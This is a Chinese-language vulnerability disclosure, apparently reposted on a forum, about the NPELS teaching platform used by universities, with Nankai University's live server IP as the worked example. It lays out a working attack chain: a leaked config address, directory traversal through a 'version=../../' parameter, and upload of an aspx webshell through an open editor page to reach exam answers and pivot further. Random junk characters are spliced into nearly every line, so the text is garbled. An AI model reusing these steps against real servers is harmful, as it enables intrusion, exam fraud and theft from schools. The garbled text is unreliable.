好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中/ A6 s7 I& N' E7 |3 D4 u; [
5 _. z8 e0 N# t d
详细说明:8 F% } g( a* f+ _; k
6 k$ W4 `1 V/ d3 a$ c/ o* H
以南开大学的为例: 1 q" h `: {' Z
http://222.30.60.3/NPELS$ W2 z; t* g- g% J/ N4 I) @/ {
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址+ Z4 r' V. r9 i. M3 l
<setting name="Update_CommonSvr_CommonService" serializeAs="String"># E4 X4 S' }) G$ o0 H5 H
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>* s t7 _2 s3 }7 _1 G9 l
</setting>
! r4 i: t( u( C$ D( [0 d及版本号3 a- Z" X2 u/ s
<add key="TVersion" value="1, 0, 0, 2187">
" [7 P8 L: z1 s1 V* K' I4 O' c# y4 y</add>& H; X+ F; g* e
直接访问
1 c& q" B' R+ f# C7 s+ Ahttp://222.30.60.3/NPELS/CommonService.asmx
1 m/ u! y" J/ W; `6 u使用GetTestClientFileList操作,直接 HTTP GET 列目录:7 ~5 ]3 p. ^2 K) a9 O6 w- e, u
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187: F* G" r8 \. W9 D$ R
进一步列目录(返回的网页很大,可以直接 wget 下来)1 z2 I( e+ G0 r; |3 ^5 [$ l
http://222.30.60.3/NPELS/CommonS ... List?version=../../+ m$ X" u2 q; `& U& X% y6 G1 K5 }
0 P( A: x, y* W* @) y2 Y
发现
) x: V R6 X3 T! ghttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
3 B. c5 \8 Q6 ~9 o, N可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
5 ` y7 V, l- Q0 Q& Y1 @) y上传后继续列目录找到木马地址直接访问即可' h- T3 V& ^5 Q i: H3 d
2 _$ }" c6 s D& V: \3 tOOXX& u2 \4 M& G% j( z
( _, g. c0 w: x7 Z( i( PGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法5 a5 W7 S! P3 h7 E5 f% ?3 ^6 `% Y" z
漏洞证明:
' i( i% q' ]& @. g, g 1 R& s# ~+ A! b. n, @+ ~. S
列目录:
1 ~' s3 f _; S& j6 t6 n* J( s& T0 q; Ahttp://222.30.60.3/NPELS/CommonS ... List?version=../../. W$ x) V% @1 D4 ~9 K
文件上传:+ Y! }6 C/ k; Q; V
http://222.30.60.3/npelsv/editor/editor.htm0 m7 {& R2 r( H8 s8 K
3 A, A% m& a: F. U
上传木马:
$ A+ a& B. U# d5 U3 @& f* K' \3 Nhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
9 `8 P: p- y& d) b: M3 s 0 C3 N/ I2 ^4 {6 ^1 {7 C" V; [
修复方案:
- r |: T6 g" N' Z2 p好像考试系统必须使用 CommonService.asmx
/ l/ E. N* Q2 [, S最好配置文件加密或者用别的方式不让它泄露出来& t K2 _, E! k6 R! Q
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
0 I1 l; }' y4 a$ }3 h. N/ X |